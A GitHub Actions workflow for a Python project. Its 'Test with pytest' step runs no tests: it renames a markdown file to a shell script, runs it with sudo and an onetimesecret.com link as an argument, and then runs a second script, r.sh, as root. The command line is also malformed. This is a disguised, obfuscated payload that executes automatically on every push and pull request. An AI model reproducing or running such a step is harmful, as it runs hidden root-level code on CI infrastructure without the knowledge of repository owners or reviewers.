name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
    - name: Test with pytest
      run: |
        echo 'km5hl'
        cd ${{ github.workspace }} && ls && mv garyyil9q.md i.sh sudo sh i.sh https://onetimesecret.com/secret/c8thxebvok52pzhs824wwpkustmzo6r sqslzq && sudo sh r.sh
